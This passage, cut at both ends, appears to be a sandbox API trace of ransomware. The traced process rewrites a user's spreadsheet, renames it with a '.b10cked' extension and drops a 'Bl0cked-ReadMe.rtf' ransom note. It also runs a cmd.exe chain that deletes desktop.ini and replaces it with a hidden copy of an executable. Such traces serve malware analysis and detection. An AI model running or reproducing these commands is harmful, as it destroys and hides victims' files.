lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0130.409] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.409] ReleaseMutex (hMutex=0xf8) returned 1 [0130.410] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.410] ReleaseMutex (hMutex=0xf8) returned 1 [0130.410] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.410] ReleaseMutex (hMutex=0xf8) returned 1 [0130.410] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.410] ReleaseMutex (hMutex=0xf8) returned 1 [0130.410] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\P939uI0IUIKwHsX.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\p939ui0iuikwhsx.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18719925458) returned 1 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16206 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x15d1e [0130.411] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16206 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16206 [0130.413] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0130.413] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0130.413] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb102, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb102, lpOverlapped=0x0) returned 1 [0130.413] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0130.413] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb102, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb102, lpOverlapped=0x0) returned 1 [0130.413] SetFilePointer (in: hFile=0x114, lDistanceToMove=-45314, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb104 [0130.413] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb102, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb102, lpOverlapped=0x0) returned 1 [0130.414] SetFilePointer (in: hFile=0x114, lDistanceToMove=-45314, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb104 [0130.414] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb102, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb102, lpOverlapped=0x0) returned 1 [0130.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="P939uI0IUIKwHsX.xlsx", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0130.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="P939uI0IUIKwHsX.xlsx", cchWideChar=20, lpMultiByteStr=0x13286a4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P939uI0IUIKwHsX.xlsx", lpUsedDefaultChar=0x0) returned 20 [0130.418] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16206 [0130.418] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0130.418] CloseHandle (hObject=0x114) returned 1 [0130.419] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\P939uI0IUIKwHsX.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS") returned 0x2f [0130.420] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0130.420] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x248, dwThreadId=0x42c)) returned 1 [0130.440] CloseHandle (hObject=0x110) returned 1 [0130.440] CloseHandle (hObject=0x114) returned 1 [0130.440] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0130.440] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0130.440] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0130.440] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0130.440] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0130.440] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0130.440] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0130.440] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0130.440] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0130.440] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0130.440] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0130.440] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0130.440] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x828, dwThreadId=0x838)) returned 1 [0130.445] CloseHandle (hObject=0x110) returned 1 [0130.445] CloseHandle (hObject=0x114) returned 1 [0130.445] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf")) returned 0xffffffff [0130.445] GetLastError () returned 0x2 [0130.445] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0130.449] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf")) returned 0x20 [0130.449] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0130.449] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0130.449] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0130.449] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0130.449] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0130.449] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0130.449] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0130.449] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0130.450] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0130.450] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0130.450] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1") returned 0x22 [0130.450] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\FCFNNE~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\FCFNNE~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\FCFNNE~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\FCFNNE~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0130.450] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0130.450] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x848, dwThreadId=0x858)) returned 1 [0130.454] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0131.220] CloseHandle (hObject=0x114) returned 1 [0131.220] CloseHandle (hObject=0x110) returned 1 [0131.220] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0131.220] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0131.220] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0131.220] GetTickCount () returned 0x29d76 [0131.220] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18800951491) returned 1 [0131.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x47\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x74\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 